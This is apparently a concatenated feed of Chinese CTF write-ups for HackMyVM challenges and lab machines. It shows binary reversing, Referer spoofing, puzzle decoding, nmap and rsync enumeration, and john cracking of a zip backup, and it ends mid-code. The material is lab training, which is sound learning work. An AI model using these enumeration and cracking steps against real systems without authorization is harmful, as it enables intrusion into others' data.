AF9lZGF0YQBfZmluaQBzdHJsZW5AR0xJQkNfMi4yLjUAcHJpbnRmQEdMSUJDXzIuMi41AF9fZGF0 YV9zdGFydABfX2dtb25fc3RhcnRfXwBfX2Rzb19oYW5kbGUAX0lPX3N0ZGluX3VzZWQAX2VuZABf X2Jzc19zdGFydABtYWluAF9faXNvYzk5X3NjYW5mQEdMSUJDXzIuNwBfX1RNQ19FTkRfXwBfSVRN X3JlZ2lzdGVyVE1DbG9uZVRhYmxlAF9fY3hhX2ZpbmFsaXplQEdMSUJDXzIuMi41AF9pbml0AAAu c3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALm5vdGUuZ251LnByb3BlcnR5AC5ub3Rl LmdudS5idWlsZC1pZAAubm90ZS5BQkktdGFnAC5nbnUuaGFzaAAuZHluc3ltAC5keW5zdHIALmdu dS52ZXJzaW9uAC5nbnUudmVyc2lvbl9yAC5yZWxhLmR5bgAucmVsYS5wbHQALmluaXQALnBsdC5n b3QALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJh eQAuZmluaV9hcnJheQAuZHluYW1pYwAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAbAAAAAQAAAAIAAAAAAAAAGAMAAAAAAAAYAwAAAAAAABwAAAAAAAAAAAAAAAAAAAAB AAAAAAAAAAAAAAAAAAAAIwAAAAcAAAACAAAAAAAAADgDAAAAAAAAOAMAAAAAAAAgAAAAAAAAAAAA AAAAAAAACAAAAAAAAAAAAAAAAAAAADYAAAAHAAAAAgAAAAAAAABYAwAAAAAAAFgDAAAAAAAAJAAA AAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABJAAAABwAAAAIAAAAAAAAAfAMAAAAAAAB8AwAA AAAAACAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAVwAAAPb//28CAAAAAAAAAKADAAAA AAAAoAMAAAAAAAAkAAAAAAAAAAYAAAAAAAAACAAAAAAAAAAAAAAAAAAAAGEAAAALAAAAAgAAAAAA AADIAwAAAAAAAMgDAAAAAAAA2AAAAAAAAAAHAAAAAQAAAAgAAAAAAAAAGAAAAAAAAABpAAAAAwAA AAIAAAAAAAAAoAQAAAAAAACgBAAAAAAAAK8AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA cQAAAP///28CAAAAAAAAAFAFAAAAAAAAUAUAAAAAAAASAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAAC AAAAAAAAAH4AAAD+//9vAgAAAAAAAABoBQAAAAAAAGgFAAAAAAAAQAAAAAAAAAAHAAAAAQAAAAgA AAAAAAAAAAAAAAAAAACNAAAABAAAAAIAAAAAAAAAqAUAAAAAAACoBQAAAAAAAMAAAAAAAAAABgAA AAAAAAAIAAAAAAAAABgAAAAAAAAAlwAAAAQAAABCAAAAAAAAAGgGAAAAAAAAaAYAAAAAAABIAAAA AAAAAAYAAAAYAAAACAAAAAAAAAAYAAAAAAAAAKEAAAABAAAABgAAAAAAAAAAEAAAAAAAAAAQAAAA AAAAFwAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAACcAAAAAQAAAAYAAAAAAAAAIBAAAAAA AAAgEAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAApwAAAAEAAAAGAAAAAAAA AGAQAAAAAAAAYBAAAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAALAAAAABAAAA BgAAAAAAAABwEAAAAAAAAHAQAAAAAAAAOAIAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAC2 AAAAAQAAAAYAAAAAAAAAqBIAAAAAAACoEgAAAAAAAAkAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAA AAAAAAAAvAAAAAEAAAACAAAAAAAAAAAgAAAAAAAAACAAAAAAAABSAAAAAAAAAAAAAAAAAAAABAAA AAAAAAAAAAAAAAAAAMQAAAABAAAAAgAAAAAAAABUIAAAAAAAAFQgAAAAAAAALAAAAAAAAAAAAAAA AAAAAAQAAAAAAAAAAAAAAAAAAADSAAAAAQAAAAIAAAAAAAAAgCAAAAAAAACAIAAAAAAAAKwAAAAA AAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA3AAAAA4AAAADAAAAAAAAANA9AAAAAAAA0C0AAAAA AAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAOgAAAAPAAAAAwAAAAAAAADYPQAAAAAA ANgtAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAAD0AAAABgAAAAMAAAAAAAAA 4D0AAAAAAADgLQAAAAAAAOABAAAAAAAABwAAAAAAAAAIAAAAAAAAABAAAAAAAAAAqwAAAAEAAAAD AAAAAAAAAMA/AAAAAAAAwC8AAAAAAAAoAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAP0A AAABAAAAAwAAAAAAAADoPwAAAAAAAOgvAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAA AAAAAAAGAQAAAQAAAAMAAAAAAAAAGEAAAAAAAAAYMAAAAAAAABAAAAAAAAAAAAAAAAAAAAAIAAAA AAAAAAAAAAAAAAAADAEAAAgAAAADAAAAAAAAAChAAAAAAAAAKDAAAAAAAAAIAAAAAAAAAAAAAAAA AAAAAQAAAAAAAAAAAAAAAAAAABEBAAABAAAAMAAAAAAAAAAAAAAAAAAAACgwAAAAAAAAHgAAAAAA AAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAABIMAAAAAAA AJADAAAAAAAAHQAAABIAAAAIAAAAAAAAABgAAAAAAAAACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAA 2DMAAAAAAAAIAgAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABEAAAADAAAAAAAAAAAAAAAA AAAAAAAAAOA1AAAAAAAAGgEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA= ```  ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ base64 -d 21.txt > 21 base64: invalid input ``` 忽略非法字符 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ base64 -d -i 21.txt > 21 ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ file 21 21: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=8d11d870b5649e8ca1a0b6777160c1fc53f1f051, for GNU/Linux 3.2.0, not stripped ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ./21 Enter passwd: 123456 Almost ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ strings 21 /lib64/ld-linux-x86-64.so.2 __cxa_finalize __libc_start_main strlen __isoc99_scanf printf libc.so.6 GLIBC_2.7 GLIBC_2.2.5 GLIBC_2.34 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable PTE1 u+UH $uperZecretP4zz Enter passwd: Almost Correct really close Close Incorrect ;*3$' GCC: (Debian 12.2.0-1) 12.2.0 Scrt1.o __abi_tag crtstuff.c deregister_tm_clones __do_global_dtors_aux completed.0 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry file.c __FRAME_END__ _DYNAMIC __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_start_main@GLIBC_2.34 _ITM_deregisterTMCloneTable _edata _fini strlen@GLIBC_2.2.5 printf@GLIBC_2.2.5 __data_start __gmon_start__ __dso_handle _IO_stdin_used _end __bss_start main __isoc99_scanf@GLIBC_2.7 __TMC_END__ _ITM_registerTMCloneTable __cxa_finalize@GLIBC_2.2.5 _init .symtab .strtab .shstrtab .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .got.plt .data .bss .comment ``` ida ``` int __fastcall main(int argc, const char **argv, const char **envp) { char s[264]; // [rsp+0h] [rbp-120h] BYREF const char *v5; // [rsp+108h] [rbp-18h] int i; // [rsp+114h] [rbp-Ch] int v7; // [rsp+118h] [rbp-8h] int v8; // [rsp+11Ch] [rbp-4h] v5 = '$uperZecretP4zz'; v8 = 0; v7 = 1; printf('Enter passwd: '); __isoc99_scanf('%s', s); if ( strlen(s) == 6 ) { if ( s[0] == 80 ) { for ( i = 1; i <= 5; ++i ) { v8 += s[i] - 48; v7 *= s[i] - 48; } if ( v8 == 24 && v7 == 2048 ) { if ( s[1] == 56 ) printf('Correct'); else printf('really close'); } else { printf('Close'); } } else { printf('Almost'); } } else { printf('Incorrect'); } return 0; } ``` 分析 ``` scanf('%s', s); // 用户输入密码，最多 263 字节，存在 s 数组中 if (strlen(s) == 6) // 密码长度必须是 6 { if (s[0] == 80) // 第一个字符必须是 ASCII 值 80 -> 'P' { // 对后5位字符 (s[1] 到 s[5])，做以下处理： // 它们必须是数字字符（因为减去 '0'(48)），否则求和乘积会错误 for (i = 1; i <= 5; ++i) { v8 += s[i] - 48; // 加总 v7 *= s[i] - 48; // 乘积 } if (v8 == 24 && v7 == 2048) // 满足加和与乘积条件 { if (s[1] == 56) // 第二个字符必须是 '8' printf('Correct'); else printf('really close'); } else { printf('Close'); } } else { printf('Almost'); } } else { printf('Incorrect'); } ``` **寻找一个以 'P8' 开头的6位密码，其后4位数字与数字8相加总和为24，相乘总积为2048。https://7r1UMPH.github.io/post/Challenge%20021.htmlThu, 12 Jun 2025 10:56:34 +0000https://7r1UMPH.github.io/post/Challenge%20020.html ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl http://momo.hackmyvm.eu/li0nsg3l9vhhe/ You are not coming from https://nepcodex.com/ ``` 伪造`Referer` 请求头 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl -e https://nepcodex.com/ http://momo.hackmyvm.eu/li0nsg3l9vhhe/ HMV{youareawelcome} ``` 。https://7r1UMPH.github.io/post/Challenge%20020.htmlThu, 12 Jun 2025 10:41:24 +0000https://7r1UMPH.github.io/post/Challenge%20019.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 019.zip -rwxr-xr-x 1 kali kali 276 Jun 12 06:34 019.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ 7z x 019.zip 7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM Scanning the drive for archives: 1 file, 276 bytes (1 KiB) Extracting archive: 019.zip -- Path = 019.zip Type = zip Physical Size = 276 Everything is Ok Size: 588 Compressed: 276 ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat 019.txt ▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄.█ ▄▄▄ █ ▄▀▄ █ █ ▄▄▄ █.█ ███ █ █▄▄█ █ ███ █.█▄▄▄▄▄█ ▄ ▄ ▄ █▄▄▄▄▄█.▄▄▄▄ ▄ ▄▀█▄▄▄ ▄▄▄ ▄.▀▄▀ ▄ ▄ ▄█▄▀ ▄██▀▀ ▄▄. █▄██▄▄███▀▄▄ ▄█ █▄▀▄.▄▄▄▄▄▄▄ ▀▄█▄▀ ▄█ ▄ ▀.█ ▄▄▄ █ ▄▄ ▀▀ ▀▀█▄▀.█ ███ █ █▀▄███ ▀ ▄▀▀ .█▄▄▄▄▄█ █▀ ▀▀▀█▀▄ ▄ ▀ ``` 看着像qr码 找规律，最后都有点，过滤一下 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat 019.txt | tr '.' '\n' ▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄ █ ▄▄▄ █ ▄▀▄ █ █ ▄▄▄ █ █ ███ █ █▄▄█ █ ███ █ █▄▄▄▄▄█ ▄ ▄ ▄ █▄▄▄▄▄█ ▄▄▄▄ ▄ ▄▀█▄▄▄ ▄▄▄ ▄ ▀▄▀ ▄ ▄ ▄█▄▀ ▄██▀▀ ▄▄ █▄██▄▄███▀▄▄ ▄█ █▄▀▄ ▄▄▄▄▄▄▄ ▀▄█▄▀ ▄█ ▄ ▀ █ ▄▄▄ █ ▄▄ ▀▀ ▀▀█▄▀ █ ███ █ █▀▄███ ▀ ▄▀▀ █▄▄▄▄▄█ █▀ ▀▀▀█▀▄ ▄ ▀ ``` 草料解一下https://cli.im/deqr/other  ``` HMV{asciiartt} ``` 。https://7r1UMPH.github.io/post/Challenge%20019.htmlThu, 12 Jun 2025 10:39:29 +0000https://7r1UMPH.github.io/post/Challenge%20018.html ``` http://momo.hackmyvm.eu/ZiP004JfyGh/ ``` ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl http://momo.hackmyvm.eu/ZiP004JfyGh/ <!doctype html> <html lang='en'> <title>018</title> Maybe the flag is in aaAxghuyrtlksd.php </html> ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl http://momo.hackmyvm.eu/ZiP004JfyGh/aaAxghuyrtlksd.php Yes, I have the flag! :) ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl -i http://momo.hackmyvm.eu/ZiP004JfyGh/aaAxghuyrtlksd.php HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 12 Jun 2025 10:30:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Yes, I have the flag! :) ``` POST请求 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl -X POST http://momo.hackmyvm.eu/ZiP004JfyGh/aaAxghuyrtlksd.php HMV{postpostpost} ``` 。https://7r1UMPH.github.io/post/Challenge%20018.htmlThu, 12 Jun 2025 10:34:09 +0000https://7r1UMPH.github.io/post/Challenge%20017.html ``` ⠓⠍⠧{⠊⠙⠕⠝⠞⠅⠝⠕⠺⠃⠗⠁⠊⠇⠇⠑} ``` 盲文 https://zh.wikipedia.org/wiki/%E7%9B%B2%E6%96%87 自己对着转 ``` HMV{idontknowbraille} ``` 。https://7r1UMPH.github.io/post/Challenge%20017.htmlThu, 12 Jun 2025 10:28:47 +0000https://7r1UMPH.github.io/post/Challenge%20016.html ``` HMV{\033[31mw\033[31mh\033[31my\033[31m i\033[31mm \033[31mn\033[31mo\033[31mt \033[39m m\033[39ma\033[39my\033[39mb\033[39me \033[39mu\033[39ms\033[39me \033[32m g\033[32mr\033[32me\033[32me\033[32mn\033[32mt\033[32mh\033[32me\033[32mf\033[32ml\033[32ma\033[32mg\033[39m} ``` 终端颜色混淆伪装 ``` why im not maybe use green the flag ``` 绿色 ``` HMV{greentheflag} ``` 。https://7r1UMPH.github.io/post/Challenge%20016.htmlThu, 12 Jun 2025 10:26:52 +0000https://7r1UMPH.github.io/post/hmv_Sabulaji.html害，这靶机，给我干沉默了 先探测ip ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ sudo arp-scan -l [sudo] password for kali: Interface: eth0, type: EN10MB, MAC: 00:0c:29:af:40:3a, IPv4: 192.168.205.206 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.205.1 00:50:56:c0:00:08 VMware, Inc. 192.168.205.2 00:50:56:f8:ba:aa VMware, Inc. 192.168.205.136 08:00:27:05:77:df PCS Systemtechnik GmbH 192.168.205.254 00:50:56:f3:0c:de VMware, Inc. 5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.966 seconds (130.21 hosts/sec). 4 responded ``` 探测服务 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ nmap -p- 192.168.205.136 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 20:39 EDT Nmap scan report for 192.168.205.136 Host is up (0.00012s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 873/tcp open rsync MAC Address: 08:00:27:05:77:DF (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds ``` https://book.hacktricks.wiki/zh/network-services-pentesting/873-pentesting-rsync.html#873---pentesting-rsync 感兴趣的自己去看，大概功能是  查看一下共享目录 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ rsync rsync://192.168.205.136:873 public Public Files epages Secret Documents ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ rsync rsync://192.168.205.136:873/public/ drwxr-xr-x 4,096 2025/05/15 12:35:39 . -rw-r--r-- 433 2025/05/15 12:35:39 todo.list ``` 拉下来 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ mkdir tmp ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ rsync -avz rsync://192.168.205.136:873/public/ ./tmp/public/ receiving incremental file list created directory ./tmp/public ./ todo.list sent 46 bytes received 380 bytes 852.00 bytes/sec total size is 433 speedup is 1.02 ┌──(kali㉿kali)-[/mnt/hgfs/gx/tmp/public] └─$ cat todo.list | trans -b :zh 2>/dev/null 待办事项列表 ========== 1。https://7r1UMPH.github.io/post/hmv_Sabulaji.htmlThu, 12 Jun 2025 02:00:59 +0000https://7r1UMPH.github.io/post/nei-bu-_bughash.html再接再厉！  看靶机ip ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ sudo arp-scan -l [sudo] password for kali: Interface: eth0, type: EN10MB, MAC: 00:0c:29:af:40:3a, IPv4: 192.168.205.206 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.205.1 00:50:56:c0:00:08 VMware, Inc. 192.168.205.2 00:50:56:f4:ef:6f VMware, Inc. 192.168.205.131 08:00:27:1f:68:e6 PCS Systemtechnik GmbH 192.168.205.254 00:50:56:ed:18:9e VMware, Inc. 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.180 seconds (117.43 hosts/sec). 4 responded ``` 探测服务 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ nmap -p22,8080 -sC -sV 192.168.205.131 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-07 23:44 EDT Nmap scan report for 192.168.205.131 Host is up (0.00079s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 10.0 (protocol 2.0) 8080/tcp open http Node.js Express framework |_http-title: \xE5\xA4\xA7\xE5\x82\xBB\xE5\xAD\x90\xE5\xBA\x8F\xE5\x88\x97\xE5\x8F\xB7\xE9\xAA\x8C\xE8\xAF\x81\xE7\xB3\xBB\xE7\xBB\x9F |_http-open-proxy: Proxy might be redirecting requests | http-robots.txt: 1 disallowed entry |_zip2john 2026bak.zip > ziphash MAC Address: 08:00:27:1F:68:E6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.20 seconds ``` 看到8080有个2026bak.zip文件，拉下来 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ wget http://192.168.205.131:8080/2026bak.zip --2025-06-07 23:46:14-- http://192.168.205.131:8080/2026bak.zip Connecting to 192.168.205.131:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 676250 (660K) [application/zip] Saving to: ‘2026bak.zip’ 2026bak.zip 100%[=============================================================================================>] 660.40K --.-KB/s in 0.03s 2025-06-07 23:46:14 (24.1 MB/s) - ‘2026bak.zip’ saved [676250/676250] ``` 尝试打开 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ 7z x 2026bak.zip 7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM Scanning the drive for archives: 1 file, 676250 bytes (661 KiB) Extracting archive: 2026bak.zip -- Path = 2026bak.zip Type = zip Physical Size = 676250 Enter password (will not be echoed): ``` 要密码，john爆破 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ zip2john 2026bak.zip > hash ver 2.0 2026bak.zip/2026bak/ is not encrypted, or stored with non-handled compression type ver 2.0 2026bak.zip/2026bak/app.js PKZIP Encr: TS_chk, cmplen=550, decmplen=1189, crc=398AEF6F ts=58E6 cs=58e6 type=8 ver 2.0 2026bak.zip/2026bak/package.json PKZIP Encr: TS_chk, cmplen=188, decmplen=269, crc=B3FD1F4B ts=51B7 cs=51b7 type=8 ver 2.0 2026bak.zip/2026bak/pnpm-lock.yaml PKZIP Encr: TS_chk, cmplen=6576, decmplen=16896, crc=8A30424C ts=95C7 cs=95c7 type=8 ver 2.0 2026bak.zip/2026bak/public/ is not encrypted, or stored with non-handled compression type ver 2.0 2026bak.zip/2026bak/public/css/ is not encrypted, or stored with non-handled compression type ver 2.0 2026bak.zip/2026bak/public/css/all.min.css PKZIP Encr: TS_chk, cmplen=22371, decmplen=102025, crc=3F9C99C5 ts=908D cs=908d type=8 ver 2.0 2026bak.zip/2026bak/public/index.html PKZIP Encr: TS_chk, cmplen=2337, decmplen=8708, crc=BA472F2A ts=6A60 cs=6a60 type=8 ver 2.0 2026bak.zip/2026bak/public/js/ is not encrypted, or stored with non-handled compression type ver 2.0 2026bak.zip/2026bak/public/js/index.js PKZIP Encr: TS_chk, cmplen=2140, decmplen=7773, crc=51B509C2 ts=50FC cs=50fc type=8 ver 2.0 2026bak.zip/2026bak/public/js/md5.min.js PKZIP Encr: TS_chk, cmplen=1587, decmplen=3770, crc=ABC5E899 ts=A254 cs=a254 type=8 ver 2.0 2026bak.zip/2026bak/public/js/seedrandom.min.js PKZIP Encr: TS_chk, cmplen=924, decmplen=1631, crc=A32D162A ts=9BE5 cs=9be5 type=8 ver 2.0 2026bak.zip/2026bak/public/robots.txt PKZIP Encr: TS_chk, cmplen=117, decmplen=122, crc=707883A9 ts=4D0C cs=4d0c type=8 ver 2.0 2026bak.zip/2026bak/public/webfonts/ is not encrypted, or stored with non-handled compression type ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-brands-400.ttf PKZIP Encr: TS_chk, cmplen=122902, decmplen=210792, crc=B603F717 ts=2BFC cs=2bfc type=8 ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-brands-400.woff2 PKZIP Encr: TS_chk, cmplen=118720, decmplen=118680, crc=E0935466 ts=2BFC cs=2bfc type=8 ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-regular-400.ttf PKZIP Encr: TS_chk, cmplen=26762, decmplen=68064, crc=8BAA11E2 ts=2BFC cs=2bfc type=8 ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-regular-400.woff2 PKZIP Encr: TS_chk, cmplen=25494, decmplen=25472, crc=D76269F6 ts=2BFC cs=2bfc type=8 ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-solid-900.ttf PKZIP Encr: TS_chk, cmplen=173643, decmplen=426112, crc=43F15403 ts=2BFC cs=2bfc type=8 ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-solid-900.woff2 PKZIP Encr: TS_chk, cmplen=158282, decmplen=158220, crc=2F37E44A ts=2BFC cs=2bfc type=8 ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-v4compatibility.ttf PKZIP Encr: TS_chk, cmplen=5048, decmplen=10836, crc=56DA8271 ts=2BFC cs=2bfc type=8 ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-v4compatibility.woff2 PKZIP Encr: TS_chk, cmplen=4813, decmplen=4796, crc=D4BF5069 ts=2BFC cs=2bfc type=8 NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, use option -o to pick a file at a time. ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) No password hashes left to crack (see FAQ) ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ john --show hash 2026bak.zip:123456789::2026bak.zip:2026bak/public/robots.txt, 2026bak/package.json, 2026bak/app.js, 2026bak/public/js/seedrandom.min.js, 2026bak/public/js/md5.min.js, 2026bak/public/js/index.js, 2026bak/public/index.html, 2026bak/public/webfonts/fa-v4compatibility.woff2:2026bak.zip 1 password hash cracked, 0 left ``` 123456789的密码，解压 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ 7z x 2026bak.zip -p123456789 7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM Scanning the drive for archives: 1 file, 676250 bytes (661 KiB) Extracting archive: 2026bak.zip -- Path = 2026bak.zip Type = zip Physical Size = 676250 Would you like to replace the existing file: Path: ./2026bak/app.js Size: 0 bytes Modified: 2025-06-05 23:07:10 with the file from archive: Path: 2026bak/app.js Size: 1189 bytes (2 KiB) Modified: 2025-06-05 23:07:10 ? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? A Everything is Ok Folders: 5 Files: 17 Size: 1165355 Compressed: 676250 ``` 看看目录结构 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cd 2026bak ┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak] └─$ tree . . ├── app.js ├── package.json ├── pnpm-lock.yaml └── public ├── css │ └── all.min.css ├── index.html ├── js │ ├── index.js │ ├── md5.min.js │ └── seedrandom.min.js ├── robots.txt └── webfonts ├── fa-brands-400.ttf ├── fa-brands-400.woff2 ├── fa-regular-400.ttf ├── fa-regular-400.woff2 ├── fa-solid-900.ttf ├── fa-solid-900.woff2 ├── fa-v4compatibility.ttf └── fa-v4compatibility.woff2 5 directories, 17 files ``` 先看app.js ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak] └─$ cat app.js const express = require('express'); const path = require('path'); const app = express(); const port = process.env.PORT || 8080; // 解析 JSON 请求体 app.use(express.json()); // 静态文件服务 app.use(express.static('public')); // /checkSN 路由 (POST请求) app.post('/checkSN', (req, res) => { // 从请求体中获取 SN 参数 const sn = req.body.sn; if (sn) { if (sn === 'xxxxxxxxxxxxxxxxxxxxxxxxx') { res.json({ code: 200, data: 'xxxxxx:XXXXX', msg: 'Success: Valid SN ' }); } else { res.json({ code: 401, data: null, msg: 'Error: Invalid SN' }); } } else { res.status(400).json({ code: 400, data: null, msg: 'Missing sn parameter in request body' }); } }); app.use((req, res) => { res.status(404).json({ code: 404, data: null, msg: '404 Not Found' }); }); app.listen(port, () => { console.log(`Server running at http://localhost:${port}`); }); ``` 解析某些字符，然后以POST请求发送到/checkSN 继续看，看public/js/index.js ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak] └─$ cat public/js/index.js document.addEventListener('DOMContentLoaded', function () { const snInput = document.getElementById('sn-input'); const verifyBtn = document.getElementById('verify-btn'); const responseText = document.getElementById('response-text'); const statusIcon = document.getElementById('status-icon'); function cleanInput(value) { return value.replace(/[^a-zA-Z0-9]/g, '').toUpperCase(); } function formatSerialNumber(value) { let cleanValue = cleanInput(value); let formatted = ''; for (let i = 0; i < cleanValue.length; i++) { if (i > 0 && i % 5 === 0) { formatted += '-'; } formatted += cleanValue[i]; } return formatted; } snInput.addEventListener('input', function () { const startPos = snInput.selectionStart; const formattedValue = formatSerialNumber(snInput.value); snInput.value = formattedValue; let newPos = startPos; if (startPos === 6 || startPos === 12 || startPos === 18 || startPos === 24) { newPos = startPos + 1; } snInput.setSelectionRange(newPos, newPos); }); snInput.addEventListener('keypress', function (e) { if (e.key === 'Enter') { verifySerialNumber(); } }); verifyBtn.addEventListener('click', verifySerialNumber); function verifySerialNumber() { const serialNumber = cleanInput(snInput.value); statusIcon.className = 'status-icon pending'; statusIcon.innerHTML = '<i class='fas fa-circle-notch fa-spin'></i>'; responseText.textContent = '验证中，请稍候...'; if (serialNumber.length !== 25) { statusIcon.className = 'status-icon error'; statusIcon.innerHTML = '<i class='fas fa-exclamation-triangle'></i>'; responseText.textContent = '错误: 序列号长度不正确 (需要25个字符)'; return; } let hashSN = CreatehashSN(snInput.value); // console.log('hashSN:', hashSN); setTimeout(function () { fetch('/checkSN', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ sn: hashSN }) }) .then(response => response.json()) .then(data => { console.log('checkSN response:', data); if (data.code === 200) { statusIcon.className = 'status-icon success'; statusIcon.innerHTML = '<i class='fas fa-check-circle'></i>'; responseText.innerHTML = `序列号 <strong>${snInput.value}</strong> <br>验证成功！<br> ${data.data}`; } else { statusIcon.className = 'status-icon error'; statusIcon.innerHTML = '<i class='fas fa-times-circle'></i>'; responseText.innerHTML = `序列号 <strong>${snInput.value}</strong> 验证失败！<br>状态: 无效或已被使用`; } }); }, 300); } }); // 随机数生成函数（使用Math.seedrandom） function R(seed, min = 100, max = 200) { // const rng = new Math.seedrandom(seed); // // return Math.floor(rng() * (max - min + 1)) + min; // return Math.floor((max - min + 1)) + min; return seed + min + max; } function CreatehashSN(SN) { // if(SN.length!== 29) // { // return '序列号长度不正确 (需要25个字符)'; // } console.log('SN', SN); const VI = 'Jkdsfojweflk0024564555*'; const KEY = 